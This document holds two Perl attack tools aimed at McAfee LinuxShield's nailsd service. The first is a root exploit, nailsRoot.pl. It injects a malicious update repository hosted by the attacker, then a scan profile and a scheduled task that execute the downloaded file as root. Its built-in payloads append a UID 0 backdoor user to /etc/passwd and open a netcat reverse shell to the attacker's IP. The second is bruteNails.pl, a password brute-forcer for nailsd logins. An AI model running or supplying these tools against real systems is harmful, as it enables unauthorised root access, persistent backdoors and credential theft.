------------------nailsRoot.pl-------------------------
#!/usr/bin/perl
## # Title: McAfee LinuxShield <= 1.5.1 Local/Remote Root Exploit # Name: nailsRoot.pl # Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de> # WARNING: This Exploit deletes the default Update Server # # Use it only for education or ethical pentesting! The author accepts # no liability for damage caused by this tool. # ##
use strict; use IO::Socket::SSL; use Getopt::Std;
my %args; my $ack; my $timestamp;
getopt('h:p:u:v:e:a:g:', \%args);
my $gen_exec = $args{g};
if (defined $gen_exec) { genEx($gen_exec); }
my $target_host = $args{h} || usage(); my $target_port = $args{p} || 65443; my $nails_user = $args{u} || usage(); my $nails_pass = $args{v} || ""; my $exec_path = $args{e} || "/opt/McAfee/cma/scratch/update/catalog.z"; my $my_host = $args{a} || "";
my $range = 50000000; my $minimum = 90000000;
my $randomtask = int(rand($range)) + $minimum;
my $pre="sconf ODS_99 "; my $post="\x0d\x0a";
my $setrepo1='db set 1 _table=repository status=1 siteList=<?xml\ version="1.0"\ encoding="UTF-8"?><ns:SiteLis'. 'ts\ xmlns:ns="naSiteList"\ GlobalVersion="20030131003110"\ LocalVersion="20091209161903"\ Type="Clie'. 'nt"><SiteList\ Default="1"\ Name="SomeGUID"><HttpSite\ Type="repository"\ Name="EvilRepo"\ Order="1"'. '\ Server="';
my $setrepo2=':80"\ Enabled="1"\ Local="1"><RelativePath>nai</RelativePath><UseAuth>0</UseAut'. 'h><UserName></UserName><Password\ Encrypted="0"/></HttpSite></SiteList></ns:SiteLists> _cmd=update';
my $setsite="task setsitelist";
my $begin="begin";
my$set="set "; my $profile=" nailsd.profile.ODS_99.allFiles=true nailsd.profile.ODS_99.childInitTmo=60". " nailsd.profile.ODS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=10000 nailsd.profile.ODS". "_5.datPath=/opt/NAI/LinuxShield/engine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.profile.". "ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibDir=/opt/NAI/LinuxShield/engine/lib nailsd.prof". "ile.ODS_99.enginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so". " nailsd.profile.ODS_99.factoryInitT". "mo=60 nailsd.profile.ODS_99.heuristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=true nailsd.p". "rofile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99.mime=true nailsd.profile.ODS_99.noJokes=false nails". "d.profile.ODS_99.program=true nailsd.profile.ODS_99.quarantineChildren=1 nailsd.profile.ODS_99.quaran". "tineDirectory=/quarantine nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.profile.ODS_99.scan". "Children=2 nailsd.profile.ODS_99.scanMaxTmo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profil". "e.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=true nailsd.profile.ODS_99.scannerPath=". "$exec_path". " nailsd.profile.ODS_99.scansPerChild=10000 nailsd.profile.ODS_99.sl". "owScanChildren=0 nailsd.profile.ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.filter.0.pat". "h=/proc nailsd.profile.ODS_99.filter.0.subdir=true nailsd.profile.ODS_99.filter.extensions.mode=all ". "nailsd.profile.ODS_99.filter.extensions.type=extension nailsd.profile.ODS_99.action.Default.primary=". "Clean nailsd.profile.ODS_99.action.Default.secondary=Quarantine nailsd.profile.ODS_99.action.App.pri". "mary=Clean nailsd.profile.ODS_99.action.App.secondary=Quarantine nailsd.profile.ODS_99.action.timeou". "t=Pass nailsd.profile.ODS_99.action.error=Block";
my $commit="commit ";
my $setdb=" _table=schedule taskName=$randomtask taskType=On-Demand taskInfo=profileName=ODS_99,". "paths=path:/root/tmp;exclude:false timetable=type=unscheduled taskResults=0 i_lastRun=1260318482 status=Stopped _cmd=insert"; #update _where= i_taskId=2";
my $execupd="task nstart LinuxShield Update"; my $execute="task nstart $randomtask";
banner();
if ($exec_path eq "/opt/McAfee/cma/scratch/update/catalog.z") { if ($my_host eq "") { usage(); } stOne(); }else{ stTwo(); }
sub stOne { my $reposock = IO::Socket::SSL->new( PeerAddr => $target_host, PeerPort => $target_port, Proto => 'tcp', );
if (defined $reposock) { print "[*] Executing Stage One\n"; print "-----------------------\n";
$ack=<$reposock>; print $ack;
print $reposock "auth ".$nails_user." ".$nails_pass.$post; $ack=<$reposock>; if ($ack=~m/ERR authentication failure/){ print "[-] Authentication failed...\n"; exit(1); } print $ack; sleep(1);
print "[+] Repo update: inject evil repo\n"; print $reposock $setrepo1.$my_host.$setrepo2.$post; sleep(1);
print "[+] Repo Site update: update site task\n"; print $reposock $setsite.$post; $ack=<$reposock>; print $ack; sleep(1);
print "[+] Execute AV Update: downloading evil code\n"; print $reposock $execupd.$post; sleep(5); # Update needs a bit time $reposock->shutdown(1); } stTwo(); }
sub stTwo { my $sock = IO::Socket::SSL->new( PeerAddr => $target_host, PeerPort => $target_port, Proto => 'tcp', );
if (defined $sock) { print "\n\n[*] Executing Stage TWO\n"; print "-----------------------\n";
$ack=<$sock>; print $ack; print $sock "auth ".$nails_user." ".$nails_pass.$post; $ack=<$sock>; if ($ack=~m/ERR authentication failure/){ print "[-] Authentication failed...\n"; exit(1); } print $ack; sleep(1);
print $sock $pre.$begin.$post; $ack=<$sock>; print $ack; $ack=~s/\+OK //g; $timestamp=$ack; $timestamp=~ s/\s+$//; print "[+] Timestamp: $timestamp\n"; print "[+] Profile: Injecting evil Profile\n"; print $sock $pre.$set.$timestamp.$profile.$post; sleep(1);
print "[+] Commit: Profile changes\n"; print $sock $pre.$commit.$timestamp.$post; sleep(1);
print "[+] Schedule: Injecting evil task $randomtask\n"; print $sock "db set ".$timestamp.$setdb.$post; sleep(1);
print "[+] Excute: Task $randomtask\n"; print $sock $execute.$post; $sock->shutdown(1); print "[+] Done... Check whatever you did\n"; } else { print "[-] some troubles with connection: $!\n" ; } }
sub usage {
print "\n"; print " nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit\n"; print "===============================================================\n\n"; print " Usage:\n"; print " $0 -h <target ip> -u <user> -v <pass> [-a <my host>|-e <executable>]\n"; print " Optional:\n"; print " -a <attacker host with httpd>\n"; print " -e <executable file on target host>\n"; print " -p <target port (default: 65443)>\n"; print " -g (1|2) <generat shell scripts to execute>\n"; print " 1 <UID 0 user add>\n"; print " 2 <reverse nc shell>\n"; print " Notes:\n"; print " -We can not handle arguments given to executable\n"; print " in the -e option.\n"; print " -To download your own evil executable, start a httpd\n"; print " and set the -a option. Create the directory <nai> in\n"; print " your wwwroot and rename your executable to <catalog.z>\n"; print " Author:\n"; print " Nikolas Sotiriu (lofi)\n"; print " url: www.sotiriu.de\n"; print " mail: lofi[at]sotiriu.de\n"; print "\n";
exit(1); }
sub genEx { my ($code)=@_; if ($code==1) { print STDERR << "EOF";
============== UID 0 user add ==============
Copy this lines to the catalog.z file.
USER=haxxor PASS=haxxorPass
-------------- cut -------------- #!/bin/sh echo haxxor:AzFQk89Xgpp8s:0:0::/:/bin/sh >> /etc/passwd -------------- /cut --------------
EOF } elsif ($code==2) { print STDERR << "EOF";
============== reverse nc shell ==============
Copy this lines to the catalog.z file.
-------------- cut -------------- #!/bin/sh nc -nv <yourip> 4444 -e /bin/sh -------------- /cut --------------
EOF
}
exit(1);
}
sub banner { print STDERR << "EOF"; -------------------------------------------------------------------------------- nailsRoot.pl - McAfee LinuxShield local/remote Root Exploit -------------------------------------------------------------------------------- 111 1111111 11100 101 00110111001111 11101 11 10 111 101 1001111111 1101 11 00 10 11 11 111 1111111101 10111 1 10 11 10 0 10 1 1 1 1111111011 1111 1 1 10 0 01 01 01 1 1 111 1111011101 1000 0 11 10 10 0 10 11 111 11111 11 1111 111100 1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11 10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111 101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111 011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001 1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001 1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101 011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01 1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111 111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111 111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001 111 1011111 1 11111111110111111111111111111111111111111 01 10111001 11 1100 10110110 10001 11101111111111111111 10 111 11100 111 00 1011101 00101 0 11111111111111111001 11 111101 11 00 00 101 1000011 1011 1111 1111111000 1111111 0 11 00 0 1011 100001 101000 1 1001 00001111 01 01101 11111 1011 01100 0101 110 11 10 10111 1 0 01 0000011 10 10 10011 11100 1111 101 11 1110 01 101011 1001100 1111000011 1 111 11000001111 1
EOF }
---------------------------bruteNails.pl--------------------------
#!/usr/bin/perl
## # Title: Brute force for McAfee LinuxShield nailsd # Name: bruteNails.pl # Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de> # WARNING: This Exploit deletes the default Update Server # # Use it only for education or ethical pentesting! The author accepts # no liability for damage caused by this tool. ##
use IO::Socket::SSL; use strict; use Getopt::Long; Getopt::Long::config qw(no_ignore_case);
$|=1;
my $total = 0; my ($list,$host,$user,$passwd,$debug,$tout,$ufile,$pfile,$ip,$port); my $stime = time();
my $opts = GetOptions( 'host:s' => \$host, 'user:s' => \$user, 'passwd:s' => \$passwd, 'debug:i' => \$debug, 'tout:i' => \$tout, 'Ufile:s' => \$ufile, 'Pfile:s' => \$pfile);
my $ip = $host;
# Default options my $port = "65443" if ! $port; my $tout = "10" if ! $tout; my $post = "\x0d\x0a";
&help unless $opts; if (!$host) { &help } if (!$user && !$ufile) { &help } if (!$passwd && !$pfile) { &help } if ($ufile && $user) { &help } if ($pfile && $passwd) { &help } #if ($ufile || $user) { &help } #if (($pfile || $passwd) && $list ) { &help }
banner();
print "#" x 80; print "\nTrying: $ip:$port ($tout secs)\n"; print "Running ....\n";
if ($ufile) { open U, "$ufile" or die "Can't open user file $ufile : $!"; while (<U>) { chomp($_); $user = $_;
if ($pfile) { open P, "$pfile" or die "Can't open passwd file: $pfile : $!"; while (<P>) { chomp($_); $passwd = $_; my $ec = &connect($ip,$port,$user,$passwd); if ($ec == 0) { print "[+] GOT ONE: $user/$passwd - $ip:$port\n"; $total++; } else { print "[-] FAILED: $user/$passwd - $ip:$port\n" if $debug; } } close (P); } else { my $ec = &connect($ip,$port,$user,$passwd); if ($ec == 0) { print "[+] GOT ONE: $user/$passwd - $ip:$port\n"; $total++; } else { print "[-] FAILED: $user/$passwd - $ip:$port\n" if $debug; } } } close (U); } else {
if ($pfile) { open P, "$pfile" or die "Can't open passwd file: $pfile : $!"; while (<P>) { chomp($_); $passwd = $_; my $ec = &connect($ip,$port,$user,$passwd); if ($ec == 0) { print "[+] GOT ONE: $user/$passwd - $ip:$port\n"; $total++; } else { print "[-] FAILED: $user/$passwd - $ip:$port\n" if $debug; } } close (P); } else { my $ec = &connect($ip,$port,$user,$passwd); if ($ec == 0) { print "[+] GOT ONE: $user/$passwd - $ip:$port\n"; $total++; } else { print "[-] FAILED: $user/$passwd - $ip:$port\n"; } } }
my $ftime = time(); my $time = $ftime - $stime; print "Finished: ($total) users found. ($time secs)\n";
sub connect { my $ec = 1; my ($ip,$port,$user,$passwd)=@_; my ($socket) = IO::Socket::SSL->new( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp') || die "Can't connect to: $ip:$port - $!\n";
$socket->autoflush(1);
my $ack=<$socket>; print $ack if $debug;
print $socket "auth ".$user." ".$passwd.$post;
my $ack=<$socket>; print $ack if $debug; if ($ack=~m/successful authentication/){ $ec=0; } close($socket); return $ec; }
sub help { print "bruteNails - McAfee nailsd bruteforcer by <nsotiriu\@sotiriu.de>\n"; print "usage: $0 -h <host> <[-u <user> | -U <file>] [-p <passwd> | -P <file>] [-t <n>] [-d <1|0>]\n"; print "options:\n"; print " -h, --host <host>\t\thost \n"; print " -u, --user <user>\t\tusername\n"; print " -U, --Ufile <file>\t\tfile with users list\n"; print " -p, --passwd <passwd>\t\tpassword\n"; print " -P, --Pfile <file>\t\tfile with passwords list\n"; print " -t, --tout <n>\t\tconnection timeout (default: 10)\n"; print " -d, --debug <1|0>\t\tenable debug (default: 0)\n"; exit 0 }
sub banner { print STDERR << "EOF"; -------------------------------------------------------------------------------- bruteNails - McAfee nailsd bruteforcer by <nsotiriu\@sotiriu.de> --------------------------------------------------------------------------------
111 1111111 11100 101 00110111001111 11101 11 10 111 101 1001111111 1101 11 00 10 11 11 111 1111111101 10111 1 10 11 10 0 10 1 1 1 1111111011 1111 1 1 10 0 01 01 01 1 1 111 1111011101 1000 0 11 10 10 0 10 11 111 11111 11 1111 111100 1111111111 01 10 10 11 01 0 11 11111111111 1 1111 11 10111110 0 01 00 11 1110 11 10 11111111111 11 11111 11 111 101111111 0 10 01 11 1 11 0 10 11 1111111111111111 1111110000111 011111 0110 10 10 0 11 1 11 01 01 111111111111111 1 11110011001 1011111 0110 10 11 1110 11 1 10 11111111111111111111 1 100 001 1011111 0 10 10 01 1 0 1 11 1 111111111111111111111111 001101 011111 0 0 0 11 0 1111 0 11 01111111111111111111111111 01 1111111 01 01 111 1 1111 1 11 1111111111111111111111 1101 1111 111 1111 10 0 111110 0111 0 1 0111111111111111111111 11111 1111 111 11111 1 11 1 1 1 111 11 11111111111111111111111110 1001 111 1011111 1 11111111110111111111111111111111111111111 01 10111001 11 1100 10110110 10001 11101111111111111111 10 111 11100 111 00 1011101 00101 0 11111111111111111001 11 111101 11 00 00 101 1000011 1011 1111 1111111000 1111111 0 11 00 0 1011 100001 101000 1 1001 00001111 01 01101 11111 1011 01100 0101 110 11 10 10111 1 0 01 0000011 10 10 10011 11100 1111 101 11 1110 01 101011 1001100 1111000011 1 111 11000001111 1
EOF }
|